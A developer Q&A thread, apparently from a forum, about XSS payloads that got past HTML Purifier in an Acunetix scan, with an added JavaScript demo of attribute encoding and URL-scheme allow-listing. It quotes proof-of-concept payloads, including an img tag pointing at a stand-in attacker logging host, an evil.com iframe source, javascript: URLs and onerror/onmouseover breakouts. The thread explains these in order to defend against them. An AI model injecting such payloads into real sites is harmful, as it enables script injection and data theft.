Updated: 2023-01-23 21:07:35
I'm testing one of my web applications using Acunetix. To protect this project against XSS attacks, I used HTML Purifier. This library is recommended by most PHP developers for this purpose, but my scan results show HTML Purifier cannot protect us from XSS attacks completely. The scanner found two ways of attack by sending different harmful inputs:
1<img sRc='http://attacker-9437/log.php?
(See HTML Purifier result here)
1"onmouseover=vVF3(9185)"
(See HTML Purifier result here)
As you can see from the results, HTML Purifier could not detect such attacks. I don't know if there is any specific option in HTML Purifier to solve such problems, or if it is really unable to detect these methods of XSS attack.
Do you have any idea? Or any other solution?
All HTML Purifier seems to be doing, from the brief look that I gave, is HTML-encoding certain characters such as <, > and so on. However, there are other means of invoking JS without using the normal HTML characters:
javascript:prompt(1) // In image tags
src="http://evil.com/xss.html" // In iFrame tags
Please review comments (by @pinkgothic) below.
<img> tag, point the src to some non-existent file, which in turn raises an error. That can then be handled by the onerror handler to run some JavaScript code. Take the following example:
<img src=x onerror=alert(document.domain)>
The entry point for this is generally accompanied by prematurely closing another tag on an input. For example (URL-decoded for clarity):
GET /products.php?type="><img src=x onerror=prompt(1)> HTTP/1.1
This, however, is easily mitigated by HTML-escaping the meta-characters (i.e. < and >).
<img src="$USER_DEFINED">
A normal example would be:
<img src="http://example.com/img.jpg">
However, inserting the above payload, we cut off the src attribute, which now points to a non-existent file, and inject an onerror handler:
<img src="1"onerror=alert(document.domain)">
This executes the same payload mentioned above.
This is heavily documented and tested in multiple places, so I won't go into detail. However, the following two articles are great on the subject and will cover all your needs:
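The following is an added example, not code from the question, the answer, or HTML Purifier itself. It reproduces the two output contexts the answer contrasts: text between tags, where encoding < and > does stop the "><img src=x onerror=prompt(1)> breakout, and the value of <img src="$USER_DEFINED">, where that same encoding leaves the 1"onerror=alert(document.domain) breakout untouched and does nothing about a javascript: URL. The function names, the small attribute tokenizer and the /static/blocked.png fallback path are my own assumptions for the demonstration.

```javascript
// Added example: compares tag-delimiter-only encoding with attribute-context
// encoding plus URL-scheme allow-listing, using the payloads quoted in the
// answer as constructed input. Not code from the page or from HTML Purifier.

// The weak output encoding the answer describes: only the tag delimiters.
function escapeAngleBrackets(s) {
  return String(s).replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Attribute-context encoding: anything that can close a quoted value or
// begin an entity must also be encoded (& < > " ').
function escapeHtmlAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// A javascript: URL contains no HTML metacharacters, so encoding cannot
// neutralise it; the scheme has to be allow-listed. Browsers ignore ASCII
// control characters (tab, newline, ...) inside the scheme and match it
// case-insensitively, so normalise before comparing.
function isSafeImageUrl(url) {
  const cleaned = String(url).replace(/[\u0000-\u0020]/g, "");
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (!scheme) return true; // relative URL, no scheme at all
  return ["http", "https"].includes(scheme[1].toLowerCase());
}

// Text context: <p>$USER_DEFINED</p>, rendered with only the weak encoder.
function renderText(userText) {
  return `<p>${escapeAngleBrackets(userText)}</p>`;
}

// Attribute context, the answer's template <img src="$USER_DEFINED">,
// with a pluggable encoder so both behaviours can be compared.
function renderImg(userSrc, encode) {
  return `<img src="${encode(userSrc)}">`;
}

// Hardened version: validate the scheme first, then encode for attributes.
// "/static/blocked.png" is an assumed placeholder, not something from the page.
function renderImgSafe(userSrc) {
  const src = isSafeImageUrl(userSrc) ? userSrc : "/static/blocked.png";
  return renderImg(src, escapeHtmlAttr);
}

// Attribute names a browser would see in a single <img ...> tag. A deliberately
// small tokenizer for the demonstration, not a full HTML parser: after a quoted
// value, the parser begins a new attribute name at the next non-space character,
// which is exactly what the 1"onerror=... payload relies on.
function imgAttributeNames(html) {
  const tag = /^<img\b([^>]*)>/i.exec(html.trim());
  if (!tag) return [];
  const names = [];
  const attr = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'=<>`]+))?/g;
  let m;
  while ((m = attr.exec(tag[1])) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True if any on* event handler ended up as its own attribute.
function hasEventHandler(html) {
  return imgAttributeNames(html).some((n) => n.startsWith("on"));
}

// Payloads quoted in the answer (constructed input for the demo).
const TEXT_PAYLOAD = '"><img src=x onerror=prompt(1)>';
const ATTR_PAYLOAD = '1"onerror=alert(document.domain)';

console.log(renderText(TEXT_PAYLOAD));                      // no <img> tag survives
console.log(renderImg(ATTR_PAYLOAD, escapeAngleBrackets));  // onerror becomes its own attribute
console.log(renderImg(ATTR_PAYLOAD, escapeHtmlAttr));       // stays inside the src value
console.log(renderImgSafe("javascript:prompt(1)"));         // scheme rejected, placeholder used
```

Two caveats follow from the code. Attribute encoding only helps when the template quotes the attribute; in <img src=$USER_DEFINED> a single space ends the value and no amount of encoding keeps onerror out. And a scheme check belongs with the attribute that takes a URL (src, href, action), because a javascript: value passes every encoder unchanged.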